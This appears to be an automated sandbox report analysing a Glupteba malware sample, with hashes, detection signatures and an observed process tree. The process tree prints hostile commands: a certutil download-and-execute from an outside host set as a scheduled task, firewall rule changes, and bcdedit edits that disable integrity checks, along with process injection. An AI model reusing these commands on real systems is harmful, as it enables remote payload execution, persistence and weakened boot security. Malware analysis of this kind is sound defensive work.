Analysis
-
max time kernel
0s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
21/01/2024, 17:38
Static task
static1
Behavioral task
behavioral1
Sample
6da0370835d68a8974fcb588fecb3fbf.exe
Resource
win7-20231129-en
General
-
Target
6da0370835d68a8974fcb588fecb3fbf.exe
-
Size
4.4MB
-
MD5
6da0370835d68a8974fcb588fecb3fbf
-
SHA1
6c791854b7146f5ef9f34b7c33e78242ca575e8c
-
SHA256
fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7
-
SHA512
9212208b0c5deeb3484f702182a2a3baf8c788380c6314af97db1e60455fd8c2e53a94f7fad849791c2d50b1db167e61a1c548893c459172f6b6f58c4954b5ed
-
SSDEEP
98304:pP68pQVjSwUHjLEvtVWkxOONscVqC/lgDtSN8xjwDpBITS:p68+VGhc1dxOOzwtS+jiTITS
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 20 IoCs
resource yara_rule behavioral1/memory/3032-2-0x0000000002F30000-0x0000000003857000-memory.dmp family_glupteba behavioral1/memory/3032-3-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/3032-5-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/3032-6-0x0000000002F30000-0x0000000003857000-memory.dmp family_glupteba behavioral1/memory/2528-9-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2528-19-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-22-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-211-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-216-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-217-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-218-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-271-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-301-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-302-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-303-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-328-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-329-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-330-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-331-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba behavioral1/memory/2416-332-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 1360 bcdedit.exe 2972 bcdedit.exe 3000 bcdedit.exe 2260 bcdedit.exe 3024 bcdedit.exe 2680 bcdedit.exe 2480 bcdedit.exe 1308 bcdedit.exe 1284 bcdedit.exe 2744 bcdedit.exe 1844 bcdedit.exe 2784 bcdedit.exe 2312 bcdedit.exe 2316 bcdedit.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2560 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1320 schtasks.exe 2772 schtasks.exe -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 32 Go-http-client/1.1 HTTP User-Agent header 33 Go-http-client/1.1 HTTP User-Agent header 39 Go-http-client/1.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"1⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"2⤵PID:2528
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:2444
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2560
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /197-1973⤵PID:2416
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:1320
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵PID:2612
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
PID:1360
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
PID:2972
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
PID:3000
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
PID:3024
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
PID:2680
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
PID:2480
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
PID:1308
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
PID:1284
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
PID:2744
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
PID:1844
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
PID:2784
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:2312
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:2316
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵PID:928
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240121173852.log C:\Windows\Logs\CBS\CbsPersist_20240121173852.cab1⤵PID:2624
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
Filesize1.3MB
MD5f0e11df20b7732e8fa70a359cb661c23
SHA12d02b0d8c0c6b7bd2e1b90bfaf6e9a0d2c39a2fb
SHA256ddcea3218320cdc914a65e9b4b2d3fcc10dd482d1fa9edce8d7d05e3457f06e5
SHA512c8eb0d1541e8a7256030b9990a54f27314a1bda82bbe99955dc7afbaec83163d460cc9007153d60aaf2780514700f7a0ab40c7e56001f11fe3a02ffae69c94ec
-
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Filesize395KB
MD55da3a881ef991e8010deed799f1a5aaf
SHA1fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA51224fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09
-
Filesize
94KB
MD5d98e78fd57db58a11f880b45bb659767
SHA1ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
334KB
MD5ee3339f6749c89218df70f883273a8a5
SHA1b971f12080009f8de374c223fd3721528c9a8dfa
SHA2564763e68a4c2bffa30f49b70564810915904412f53b2117df9af87a21a1873899
SHA51271852c25b487d367f368bb39f334cc76f06a1726880e1c71071a96809cd43bdb97a2bf5da54c3f1c5225100cf0e7ddf956986c10a4fc82be32f76a4e756d7c29
-
Filesize
130KB
MD52741c1f51b156c3cc4d8354e7ece80fd
SHA1595ad9adb7bb5a2fa6d0ea702a929fd9e92aae24
SHA256c4c5e8302363960a159c38d0cb1e926e6703530f6caf858d4636ca0253213adb
SHA512490d5fb5abaa72b42603bfc2660907dee82234cb0f88760ac9496edfe9c62a3673e979c5a51dbf34da0a9be8a7a4731853f0af51e0bf52863fc55f1cd961f9c8
-
Filesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize64KB
MD5d71dff97ca86ca16c3db8bdb5285fb35
SHA1271c01246897497d069b81ed37af296cf6c1e498
SHA2564a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac
SHA5121fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD538b7eabd6a868cdfebcb09d110c67825
SHA17225a012527be250763f52d14250ff0556ac8a9e
SHA25642ef174b129710297bdde703f78941a7d711aa5544751fa610fdfc413ea0bfbe
SHA5125655e52d7506b00e40968a1131be1684d8bf09f60e87493d63ed9337f5d90d899ff198c110bbcf2bae594b6f22d126171b3dfeda4538ba456dcac7bbfe18cb41
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5fbb403b06bae03197b6d95bd468d8527
SHA109bb35f55ac81f51375a6122afe0ca4a26bf3800
SHA256f50a04c75dc5be1b12a52cb163fd3ff176f24078f78fde575e7ecb3754e1157d
SHA512bd35baa4ec3187d5e70d0852853bab4abde2df4a4bd5e2a2ee35399870ec616539046e0bcb92406488bc9618187ea01836e76da02750d52c28534e7b7e1e5015
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5d44640c7ac51cc9049e03edeee8b96fd
SHA137eb0fa6fd118d17b5455317d1ae639e7ef56251
SHA256c5def655c89dded84a37a3dbbd84b907680f121dcd5ec20b8ef0823b34d4169b
SHA5124a08b9c4d1908e7541457dd3cc6712c3509443a38053835943b602f2aac74c91f4c544dd0593d029d14b78a9cfcd9e3f0b638bfacfcb544fe129c76a837e1e1b
-
Filesize
75KB
MD507a8f54a0752a9853479aeb2129f599d
SHA102d76478c642a21356716ecdf620ec4863936b71
SHA256fa1e7fc24766633ae74bfefa9c10c11cc788862b8cfe5f75396b20aa84a4a593
SHA512f23bb7376ac31bdcff8a7981dfd7711702113c9159cc7e3ddda520ae0c6f35b768d30755a8e2374196b47edf906dbc6e5d1fadfb5831f263d4c557211f2ad54f
-
Filesize
1.1MB
MD5c26036e7be1c7717ff2e3a804b2d75a3
SHA1a0ec868a916a4e291b783efa195424955bf11cd9
SHA25695287ab95c5a2acc05c8a01d154de1bf719585fcbfd132416088512d74029e5b
SHA5129f26f47f6acb614b52edcaca0d8c9123475464479c4e6dccd718963163e31b4dcaf624789fd26043f05de4893bf961a12eaa3a1f10d35bc88ae1b18bb10be8fd
-
Filesize
1.2MB
MD5e0e462f7394a42e87d3cfa375cd94fc0
SHA18f9fd17b3716621d937cc8579d44b4b5672365ac
SHA256b0193041bf4944a8ab2db47323b9a4e2d26e535cac2be88af6f23ad774a7ed99
SHA5126db6e5386b1db8c31e1529f0e5b933b860d3c25efcc938cd22134ad32431fcc6a7ccaa3ee5c5c699c45f4a673fbbe2dffbd9b67ac7a21acf2f98956f15087d37
-
Filesize
687KB
MD5fd785bbb06ce98864a925df95e16b8c5
SHA103e4cc85670fc80cb6e98029645ea955fd5f2974
SHA2566d7011d41d349a0a28428df0cc114c1ba0238c8060d2298579ccbcc22d629ebe
SHA512f0bef8c21c154437503f02bb04e0da1381ab251c4f4b41883c3f46f77b3000f88f2208b3dfe56d76683fa6197be225d891a208c085f0a2b086be8debf0d28891
-
Filesize
377KB
MD5bf78afa0bf26d0b7448b2f3a2acc32f4
SHA19d8ab648e689f0a6ead9878ad33d21c8829b356b
SHA256a2148f29b2226818f37ddcc59743cefef0145defad6d4fca74210ca0ecef49dd
SHA51271765cbd6754567987a7bbb451424e78260ad22ad159f9726746ac4db80192f51171818bd0490027bd8c2aff9fffbb3aa043e190e469518b57f97b88ca37024e
-
Filesize
327KB
MD5117b6ea2c794811428fea2fc25eae383
SHA1d5673c2832adaa659badc1baa135420fc63ae889
SHA256a89e6c0c06c2c8fcc7620d123dc81f1bbd0915c15dfae1e5c9c45af11b446996
SHA51252a20cd725c9ea068e6bae97c59b7716ef6fb844b578b55f16842a9006254a6e59afb25ba7dc0cdace243a576b75c10b8a910afaef526349f9892ab6631eafb3
-
Filesize
553KB
MD50791570b2d0769f0a251dde143c16bf4
SHA140805bacf3116e06bd0453de7484858f4e1e7e82
SHA2567e36a77bc6ac8b20b50e036f9b59d09102027435b99874b6431b79b735b0f29f
SHA512c431e7fd6c2603f5310ab41dcb6036fa1eb479d5c020d446dc0348bc9a3ed97d31b0046db2e073ca7832c8bfc43c9d9f8a7212959009d9215bc54877400d0c9a
-
Filesize
169KB
MD5e5fb512f3dd17d1302f02f000dfe5693
SHA195529fe6f04aa1039c8795d7550d1446762af009
SHA2565381925c4a34a536ba0c2fa93d391252d91ca5d453768feec133ad547ffe3c79
SHA512fec4d96f82b32786dbdafd075b9f940298ba8654fbfa5cb18d14078e0fd95bacb61acdc532058fc71bc46f0824c0eca242641947956495bfc4c8910aadf5dbe9
-
Filesize
433KB
MD540994b10b6ae95dcef1d22c91cae0ae9
SHA185459e6b4eefcc0c15df157413a8fe6358dfa4d1
SHA2567dd45d5e762f72da56a5daf0d2bf4d1dc4255dff18422bbba099f7fbabd77d08
SHA512e593475b72fb90e3a200a13dfd9540b5f155ee4c38d95cbb0f5db197f2167c7b35911479680c6fa75b36617fcc67fe7398ce670f05d789167372ed1500c64844
-
Filesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
Filesize
1.2MB
MD52c763260ff725d955728ac64dadf3958
SHA1b335f3a6e525fd9e6ef60467160708d1c57ca545
SHA256227a58c88ea338cf0acaa3693a545880e63fa5bd58a97f09acb1843d88df7cc4
SHA512ff2243ef68efb03460d25aabc74883d9c972a013c5d4061aef25d8bfb8eb73a493bcd76320d61c1ce0ecfa3890373cf6c92703a1a2de26f9d2f5c3e909d70cab
-
Filesize
2.5MB
MD5d23cab124d8ccf930b2d1fad102fd2a7
SHA10b13d0dd1c8f66ccb8cb8fb373eb6f7bbaf48781
SHA25609be4c8472334b9ec35bf3c1b97b0a2726e527e30a92408ee1854c1bb445966e
SHA512649b860ff48bf46f91813f7b9e0ad2d1c56610b4f0a6ef5428878cc4fdeb11d7dc6634a5f2e0b27d54504cc8955757e91aecf4581d50b2142e242d9a51d2187b